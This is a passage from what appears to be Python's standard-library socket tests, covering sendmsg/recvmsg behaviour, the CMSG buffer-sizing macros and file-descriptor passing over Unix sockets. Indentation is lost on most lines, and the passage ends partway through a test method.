# client's and the server's end of the connection respectively, and
# attributes cli_addr and serv_addr holding their (numeric where
# appropriate) addresses.
#
# The final concrete test classes combine these with subclasses of
# SocketTestBase which set up client and server sockets of a specific
# type, and with subclasses of SendrecvmsgBase such as
# SendrecvmsgDgramBase and SendrecvmsgConnectedBase which map these
# sockets to cli_sock and serv_sock and override the methods and
# attributes of SendrecvmsgBase to fill in destination addresses if
# needed when sending, check for specific flags in msg_flags, etc.
#
# RecvmsgIntoMixin provides a version of doRecvmsg() implemented using
# recvmsg_into().
# XXX: like the other datagram (UDP) tests in this module, the code
# here assumes that datagram delivery on the local machine will be
# reliable.
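# For orientation only, a minimal sketch of how the pieces above combine (the
# class names here are illustrative; the concrete classes defined further down
# may use different names): a generic test mixin is paired with a
# transport-specific base that supplies cli_sock/serv_sock and the address
# attributes, roughly like
#
#     class SendmsgUDPTestExample(SendmsgConnectionlessTests,
#                                 SendrecvmsgUDPTestBase):
#         pass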
class SendrecvmsgBase(ThreadSafeCleanupTestCase):
# Base class for sendmsg()/recvmsg() tests.
# Time in seconds to wait before considering a test failed, or
# None for no timeout. Not all tests actually set a timeout.
fail_timeout = 3.0
def setUp(self):
self.misc_event = threading.Event()
super().setUp()
def sendToServer(self, msg):
# Send msg to the server.
return self.cli_sock.send(msg)
# Tuple of alternative default arguments for sendmsg() when called
# via sendmsgToServer() (e.g. to include a destination address).
sendmsg_to_server_defaults = ()
def sendmsgToServer(self, *args):
# Call sendmsg() on self.cli_sock with the given arguments,
# filling in any arguments which are not supplied with the
# corresponding items of self.sendmsg_to_server_defaults, if
# any.
return self.cli_sock.sendmsg(
*(args + self.sendmsg_to_server_defaults[len(args):]))
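    # For example (a sketch based on the connectionless subclass below): if
    # sendmsg_to_server_defaults is ([], [], 0, self.serv_addr), then
    # sendmsgToServer([MSG]) expands to
    # self.cli_sock.sendmsg([MSG], [], 0, self.serv_addr), while
    # sendmsgToServer([MSG], ancdata) only fills in the last two defaults.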
def doRecvmsg(self, sock, bufsize, *args):
# Call recvmsg() on sock with given arguments and return its
# result. Should be used for tests which can use either
# recvmsg() or recvmsg_into() - RecvmsgIntoMixin overrides
# this method with one which emulates it using recvmsg_into(),
# thus allowing the same test to be used for both methods.
result = sock.recvmsg(bufsize, *args)
self.registerRecvmsgResult(result)
return result
def registerRecvmsgResult(self, result):
# Called by doRecvmsg() with the return value of recvmsg() or
# recvmsg_into(). Can be overridden to arrange cleanup based
# on the returned ancillary data, for instance.
pass
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer.
self.assertEqual(addr1, addr2)
# Flags that are normally unset in msg_flags
msg_flags_common_unset = 0
for name in ("MSG_CTRUNC", "MSG_OOB"):
msg_flags_common_unset |= getattr(socket, name, 0)
# Flags that are normally set
msg_flags_common_set = 0
# Flags set when a complete record has been received (e.g. MSG_EOR
# for SCTP)
msg_flags_eor_indicator = 0
# Flags set when a complete record has not been received
# (e.g. MSG_TRUNC for datagram sockets)
msg_flags_non_eor_indicator = 0
def checkFlags(self, flags, eor=None, checkset=0, checkunset=0, ignore=0):
# Method to check the value of msg_flags returned by recvmsg[_into]().
#
# Checks that all bits in msg_flags_common_set attribute are
# set in "flags" and all bits in msg_flags_common_unset are
# unset.
#
# The "eor" argument specifies whether the flags should
# indicate that a full record (or datagram) has been received.
# If "eor" is None, no checks are done; otherwise, checks
# that:
#
# * if "eor" is true, all bits in msg_flags_eor_indicator are
# set and all bits in msg_flags_non_eor_indicator are unset
#
# * if "eor" is false, all bits in msg_flags_non_eor_indicator
# are set and all bits in msg_flags_eor_indicator are unset
#
# If "checkset" and/or "checkunset" are supplied, they require
# the given bits to be set or unset respectively, overriding
# what the attributes require for those bits.
#
# If any bits are set in "ignore", they will not be checked,
# regardless of the other inputs.
#
# Will raise Exception if the inputs require a bit to be both
# set and unset, and it is not ignored.
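        # Worked example (illustrative): with eor=True and
        # msg_flags_eor_indicator == MSG_EOR, MSG_EOR lands in "checkset"
        # below, so the final assertion requires it to be set in "flags".
        # An explicit checkunset=MSG_EOR overrides that default (the bit is
        # then required to be unset instead); the "contradictory" exception
        # only fires when the same bit ends up in both checkset and
        # checkunset, e.g. checkset=MSG_OOB together with checkunset=MSG_OOB.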
defaultset = self.msg_flags_common_set
defaultunset = self.msg_flags_common_unset
if eor:
defaultset |= self.msg_flags_eor_indicator
defaultunset |= self.msg_flags_non_eor_indicator
elif eor is not None:
defaultset |= self.msg_flags_non_eor_indicator
defaultunset |= self.msg_flags_eor_indicator
# Function arguments override defaults
defaultset &= ~checkunset
defaultunset &= ~checkset
# Merge arguments with remaining defaults, and check for conflicts
checkset |= defaultset
checkunset |= defaultunset
inboth = checkset & checkunset & ~ignore
if inboth:
raise Exception("contradictory set, unset requirements for flags "
"{0:#x}".format(inboth))
# Compare with given msg_flags value
mask = (checkset | checkunset) & ~ignore
self.assertEqual(flags & mask, checkset & mask)
class RecvmsgIntoMixin(SendrecvmsgBase):
# Mixin to implement doRecvmsg() using recvmsg_into().
def doRecvmsg(self, sock, bufsize, *args):
buf = bytearray(bufsize)
result = sock.recvmsg_into([buf], *args)
self.registerRecvmsgResult(result)
self.assertGreaterEqual(result[0], 0)
self.assertLessEqual(result[0], bufsize)
return (bytes(buf[:result[0]]),) + result[1:]
class SendrecvmsgDgramFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for datagram sockets.
@property
def msg_flags_non_eor_indicator(self):
return super().msg_flags_non_eor_indicator | socket.MSG_TRUNC
class SendrecvmsgSCTPFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for SCTP sockets.
@property
def msg_flags_eor_indicator(self):
return super().msg_flags_eor_indicator | socket.MSG_EOR
class SendrecvmsgConnectionlessBase(SendrecvmsgBase):
# Base class for tests on connectionless-mode sockets. Users must
# supply sockets on attributes cli and serv to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.serv
@property
def cli_sock(self):
return self.cli
@property
def sendmsg_to_server_defaults(self):
return ([], [], 0, self.serv_addr)
def sendToServer(self, msg):
return self.cli_sock.sendto(msg, self.serv_addr)
class SendrecvmsgConnectedBase(SendrecvmsgBase):
# Base class for tests on connected sockets. Users must supply
# sockets on attributes serv_conn and cli_conn (representing the
# connections *to* the server and the client), to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.cli_conn
@property
def cli_sock(self):
return self.serv_conn
def checkRecvmsgAddress(self, addr1, addr2):
# Address is currently "unspecified" for a connected socket,
# so we don't examine it
pass
class SendrecvmsgServerTimeoutBase(SendrecvmsgBase):
# Base class to set a timeout on server's socket.
def setUp(self):
super().setUp()
self.serv_sock.settimeout(self.fail_timeout)
class SendmsgTests(SendrecvmsgServerTimeoutBase):
# Tests for sendmsg() which can use any socket type and do not
# involve recvmsg() or recvmsg_into().
def testSendmsg(self):
# Send a simple message with sendmsg().
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG]), len(MSG))
def testSendmsgDataGenerator(self):
        # Send from a buffer obtained from a generator (not a sequence).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgDataGenerator(self):
self.assertEqual(self.sendmsgToServer((o for o in [MSG])),
len(MSG))
def testSendmsgAncillaryGenerator(self):
# Gather (empty) ancillary data from a generator.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgAncillaryGenerator(self):
self.assertEqual(self.sendmsgToServer([MSG], (o for o in [])),
len(MSG))
def testSendmsgArray(self):
# Send data from an array instead of the usual bytes object.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgArray(self):
self.assertEqual(self.sendmsgToServer([array.array("B", MSG)]),
len(MSG))
def testSendmsgGather(self):
# Send message data from more than one buffer (gather write).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgGather(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
def testSendmsgBadArgs(self):
# Check that sendmsg() rejects invalid arguments.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadArgs(self):
self.assertRaises(TypeError, self.cli_sock.sendmsg)
self.assertRaises(TypeError, self.sendmsgToServer,
b"not in an iterable")
self.assertRaises(TypeError, self.sendmsgToServer,
object())
self.assertRaises(TypeError, self.sendmsgToServer,
[object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG, object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], 0, object())
self.sendToServer(b"done")
def testSendmsgBadCmsg(self):
# Check that invalid ancillary data items are rejected.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(object(), 0, b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, object(), b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, object())])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0)])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b"data", 42)])
self.sendToServer(b"done")
@requireAttrs(socket, "CMSG_SPACE")
def testSendmsgBadMultiCmsg(self):
# Check that invalid ancillary data items are rejected when
# more than one item is present.
self.assertEqual(self.serv_sock.recv(1000), b"done")
@testSendmsgBadMultiCmsg.client_skip
def _testSendmsgBadMultiCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [0, 0, b""])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b""), object()])
self.sendToServer(b"done")
def testSendmsgExcessCmsgReject(self):
# Check that sendmsg() rejects excess ancillary data items
# when the number that can be sent is limited.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgExcessCmsgReject(self):
if not hasattr(socket, "CMSG_SPACE"):
# Can only send one item
with self.assertRaises(OSError) as cm:
self.sendmsgToServer([MSG], [(0, 0, b""), (0, 0, b"")])
self.assertIsNone(cm.exception.errno)
self.sendToServer(b"done")
def testSendmsgAfterClose(self):
# Check that sendmsg() fails on a closed socket.
pass
def _testSendmsgAfterClose(self):
self.cli_sock.close()
self.assertRaises(OSError, self.sendmsgToServer, [MSG])
class SendmsgStreamTests(SendmsgTests):
# Tests for sendmsg() which require a stream socket and do not
# involve recvmsg() or recvmsg_into().
def testSendmsgExplicitNoneAddr(self):
# Check that peer address can be specified as None.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgExplicitNoneAddr(self):
self.assertEqual(self.sendmsgToServer([MSG], [], 0, None), len(MSG))
def testSendmsgTimeout(self):
# Check that timeout works with sendmsg().
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
def _testSendmsgTimeout(self):
try:
self.cli_sock.settimeout(0.03)
with self.assertRaises(socket.timeout):
while True:
self.sendmsgToServer([b"a"*512])
finally:
self.misc_event.set()
# XXX: would be nice to have more tests for sendmsg flags argument.
# Linux supports MSG_DONTWAIT when sending, but in general, it
# only works when receiving. Could add other platforms if they
# support it too.
@skipWithClientIf(sys.platform not in {"linux"},
"MSG_DONTWAIT not known to work on this platform when "
"sending")
def testSendmsgDontWait(self):
# Check that MSG_DONTWAIT in flags causes non-blocking behaviour.
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@testSendmsgDontWait.client_skip
def _testSendmsgDontWait(self):
try:
with self.assertRaises(OSError) as cm:
while True:
self.sendmsgToServer([b"a"*512], [], socket.MSG_DONTWAIT)
self.assertIn(cm.exception.errno,
(errno.EAGAIN, errno.EWOULDBLOCK))
finally:
self.misc_event.set()
class SendmsgConnectionlessTests(SendmsgTests):
# Tests for sendmsg() which require a connectionless-mode
# (e.g. datagram) socket, and do not involve recvmsg() or
# recvmsg_into().
def testSendmsgNoDestAddr(self):
# Check that sendmsg() fails when no destination address is
# given for unconnected socket.
pass
def _testSendmsgNoDestAddr(self):
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG])
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG], [], 0, None)
class RecvmsgGenericTests(SendrecvmsgBase):
# Tests for recvmsg() which can also be emulated using
# recvmsg_into(), and can use any socket type.
def testRecvmsg(self):
# Receive a simple message with recvmsg[_into]().
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsg(self):
self.sendToServer(MSG)
def testRecvmsgExplicitDefaults(self):
# Test recvmsg[_into]() with default arguments provided explicitly.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgExplicitDefaults(self):
self.sendToServer(MSG)
def testRecvmsgShorter(self):
# Receive a message smaller than buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) + 42)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShorter(self):
self.sendToServer(MSG)
# FreeBSD < 8 doesn't always set the MSG_TRUNC flag when a truncated
# datagram is received (issue #13001).
@support.requires_freebsd_version(8)
def testRecvmsgTrunc(self):
# Receive part of message, check for truncation indicators.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
@support.requires_freebsd_version(8)
def _testRecvmsgTrunc(self):
self.sendToServer(MSG)
def testRecvmsgShortAncillaryBuf(self):
# Test ancillary data buffer too small to hold any ancillary data.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShortAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgLongAncillaryBuf(self):
# Test large ancillary data buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgLongAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgAfterClose(self):
# Check that recvmsg[_into]() fails on a closed socket.
self.serv_sock.close()
self.assertRaises(OSError, self.doRecvmsg, self.serv_sock, 1024)
def _testRecvmsgAfterClose(self):
pass
def testRecvmsgTimeout(self):
# Check that timeout works.
try:
self.serv_sock.settimeout(0.03)
self.assertRaises(socket.timeout,
self.doRecvmsg, self.serv_sock, len(MSG))
finally:
self.misc_event.set()
def _testRecvmsgTimeout(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@requireAttrs(socket, "MSG_PEEK")
def testRecvmsgPeek(self):
# Check that MSG_PEEK in flags enables examination of pending
# data without consuming it.
# Receive part of data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3, 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
# Ignoring MSG_TRUNC here (so this test is the same for stream
# and datagram sockets). Some wording in POSIX seems to
# suggest that it needn't be set when peeking, but that may
# just be a slip.
self.checkFlags(flags, eor=False,
ignore=getattr(socket, "MSG_TRUNC", 0))
# Receive all data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
# Check that the same data can still be received normally.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgPeek.client_skip
def _testRecvmsgPeek(self):
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
def testRecvmsgFromSendmsg(self):
# Test receiving with recvmsg[_into]() when message is sent
# using sendmsg().
self.serv_sock.settimeout(self.fail_timeout)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgFromSendmsg.client_skip
def _testRecvmsgFromSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
class RecvmsgGenericStreamTests(RecvmsgGenericTests):
# Tests which require a stream socket and can use either recvmsg()
# or recvmsg_into().
def testRecvmsgEOF(self):
# Receive end-of-stream indicator (b"", peer socket closed).
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.assertEqual(msg, b"")
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=None) # Might not have end-of-record marker
def _testRecvmsgEOF(self):
self.cli_sock.close()
def testRecvmsgOverflow(self):
# Receive a message in more than one chunk.
seg1, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
seg2, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testRecvmsgOverflow(self):
self.sendToServer(MSG)
class RecvmsgTests(RecvmsgGenericTests):
# Tests for recvmsg() which can use any socket type.
def testRecvmsgBadArgs(self):
# Check that recvmsg() rejects invalid arguments.
self.assertRaises(TypeError, self.serv_sock.recvmsg)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
-1, 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
len(MSG), -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
[bytearray(10)], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
object(), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), 0, object())
msg, ancdata, flags, addr = self.serv_sock.recvmsg(len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgBadArgs(self):
self.sendToServer(MSG)
class RecvmsgIntoTests(RecvmsgIntoMixin, RecvmsgGenericTests):
# Tests for recvmsg_into() which can use any socket type.
def testRecvmsgIntoBadArgs(self):
# Check that recvmsg_into() rejects invalid arguments.
buf = bytearray(len(MSG))
self.assertRaises(TypeError, self.serv_sock.recvmsg_into)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
len(MSG), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
buf, 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[object()], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[b"I'm not writable"], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf, object()], 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg_into,
[buf], -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], 0, object())
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf], 0, 0)
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoBadArgs(self):
self.sendToServer(MSG)
def testRecvmsgIntoGenerator(self):
        # Receive into a buffer obtained from a generator (not a sequence).
buf = bytearray(len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
(o for o in [buf]))
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoGenerator(self):
self.sendToServer(MSG)
def testRecvmsgIntoArray(self):
# Receive into an array rather than the usual bytearray.
buf = array.array("B", [0] * len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf])
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf.tobytes(), MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoArray(self):
self.sendToServer(MSG)
def testRecvmsgIntoScatter(self):
# Receive into multiple buffers (scatter write).
b1 = bytearray(b"----")
b2 = bytearray(b"0123456789")
b3 = bytearray(b"--------------")
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
[b1, memoryview(b2)[2:9], b3])
self.assertEqual(nbytes, len(b"Mary had a little lamb"))
self.assertEqual(b1, bytearray(b"Mary"))
self.assertEqual(b2, bytearray(b"01 had a 9"))
self.assertEqual(b3, bytearray(b"little lamb---"))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoScatter(self):
self.sendToServer(b"Mary had a little lamb")
class CmsgMacroTests(unittest.TestCase):
# Test the functions CMSG_LEN() and CMSG_SPACE(). Tests
# assumptions used by sendmsg() and recvmsg[_into](), which share
# code with these functions.
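    # Rough illustration (platform-dependent; assuming a typical 64-bit Linux
    # build): CMSG_LEN(0) == sizeof(struct cmsghdr) == 16, so CMSG_LEN(4) == 20
    # while CMSG_SPACE(4) rounds up to 24.  The assertions below check, among
    # other things, that CMSG_LEN(n) - CMSG_LEN(0) == n and that CMSG_SPACE(n)
    # is at least CMSG_LEN(n) and monotonically non-decreasing.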
# Match the definition in socketmodule.c
try:
import _testcapi
except ImportError:
socklen_t_limit = 0x7fffffff
else:
socklen_t_limit = min(0x7fffffff, _testcapi.INT_MAX)
@requireAttrs(socket, "CMSG_LEN")
def testCMSG_LEN(self):
# Test CMSG_LEN() with various valid and invalid values,
# checking the assumptions used by recvmsg() and sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_LEN(0) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(socket.CMSG_LEN(0), array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_LEN(n)
# This is how recvmsg() calculates the data size
self.assertEqual(ret - socket.CMSG_LEN(0), n)
self.assertLessEqual(ret, self.socklen_t_limit)
self.assertRaises(OverflowError, socket.CMSG_LEN, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_LEN, toobig)
self.assertRaises(OverflowError, socket.CMSG_LEN, sys.maxsize)
@requireAttrs(socket, "CMSG_SPACE")
def testCMSG_SPACE(self):
# Test CMSG_SPACE() with various valid and invalid values,
# checking the assumptions used by sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_SPACE(1) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
last = socket.CMSG_SPACE(0)
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(last, array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_SPACE(n)
self.assertGreaterEqual(ret, last)
self.assertGreaterEqual(ret, socket.CMSG_LEN(n))
self.assertGreaterEqual(ret, n + socket.CMSG_LEN(0))
self.assertLessEqual(ret, self.socklen_t_limit)
last = ret
self.assertRaises(OverflowError, socket.CMSG_SPACE, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_SPACE, toobig)
self.assertRaises(OverflowError, socket.CMSG_SPACE, sys.maxsize)
class SCMRightsTest(SendrecvmsgServerTimeoutBase):
# Tests for file descriptor passing on Unix-domain sockets.
# Invalid file descriptor value that's unlikely to evaluate to a
# real FD even if one of its bytes is replaced with a different
# value (which shouldn't actually happen).
badfd = -0x5555
def newFDs(self, n):
# Return a list of n file descriptors for newly-created files
# containing their list indices as ASCII numbers.
fds = []
for i in range(n):
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
self.addCleanup(os.close, fd)
os.write(fd, str(i).encode())
fds.append(fd)
return fds
def checkFDs(self, fds):
# Check that the file descriptors in the given list contain
# their correct list indices as ASCII numbers.
for n, fd in enumerate(fds):
os.lseek(fd, 0, os.SEEK_SET)
self.assertEqual(os.read(fd, 1024), str(n).encode())
def registerRecvmsgResult(self, result):
self.addCleanup(self.closeRecvmsgFDs, result)
def closeRecvmsgFDs(self, recvmsg_result):
# Close all file descriptors specified in the ancillary data
# of the given return value from recvmsg() or recvmsg_into().
for cmsg_level, cmsg_type, cmsg_data in recvmsg_result[1]:
if (cmsg_level == socket.SOL_SOCKET and
cmsg_type == socket.SCM_RIGHTS):
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
for fd in fds:
os.close(fd)
def createAndSendFDs(self, n):
# Send n new file descriptors created by newFDs() to the
# server, with the constant MSG as the non-ancillary data.
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(n)))]),
len(MSG))
def checkRecvmsgFDs(self, numfds, result, maxcmsgs=1, ignoreflags=0):
# Check that constant MSG was received with numfds file
# descriptors in a maximum of maxcmsgs control messages (which
# must contain only complete integers). By default, check
# that MSG_CTRUNC is unset, but ignore any flags in
# ignoreflags.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertIsInstance(ancdata, list)
self.assertLessEqual(len(ancdata), maxcmsgs)
fds = array.array("i")
for item in ancdata:
self.assertIsInstance(item, tuple)
cmsg_level, cmsg_type, cmsg_data = item
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data) % SIZEOF_INT, 0)
fds.frombytes(cmsg_data)
self.assertEqual(len(fds), numfds)
self.checkFDs(fds)
def testFDPassSimple(self):
# Pass a single FD (array read from bytes object).
self.checkRecvmsgFDs(1, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testFDPassSimple(self):
self.assertEqual(
self.sendmsgToServer(
[MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(1)).tobytes())]),
len(MSG))
def testMultipleFDPass(self):
# Pass multiple FDs in a single array.
self.checkRecvmsgFDs(4, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testMultipleFDPass(self):
self.createAndSendFDs(4)
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassCMSG_SPACE(self):
# Test using CMSG_SPACE() to calculate ancillary buffer size.
self.checkRecvmsgFDs(
4, self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(4 * SIZEOF_INT)))
@testFDPassCMSG_SPACE.client_skip
def _testFDPassCMSG_SPACE(self):
self.createAndSendFDs(4)
def testFDPassCMSG_LEN(self):
# Test using CMSG_LEN() to calculate ancillary buffer size.
self.checkRecvmsgFDs(1,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(4 * SIZEOF_INT)),
# RFC 3542 says implementations may set
# MSG_CTRUNC if there isn't enough space
# for trailing padding.
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassCMSG_LEN(self):
self.createAndSendFDs(1)
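# Rough relationship between the two buffer-sizing macros used above and
# below (a sketch; exact values are platform-dependent):
#
#     socket.CMSG_LEN(n)   ~ sizeof(struct cmsghdr) + n             (no tail padding)
#     socket.CMSG_SPACE(n) ~ sizeof(struct cmsghdr) + n + padding   (aligned)
#
# so CMSG_SPACE(n) >= CMSG_LEN(n) >= n, which is why a CMSG_LEN-sized
# buffer may legitimately come back with MSG_CTRUNC set.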
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparate(self):
# Pass two FDs in two separate arrays. Arrays may be combined
# into a single control message by the OS.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG), 10240),
maxcmsgs=2)
@testFDPassSeparate.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
def _testFDPassSeparate(self):
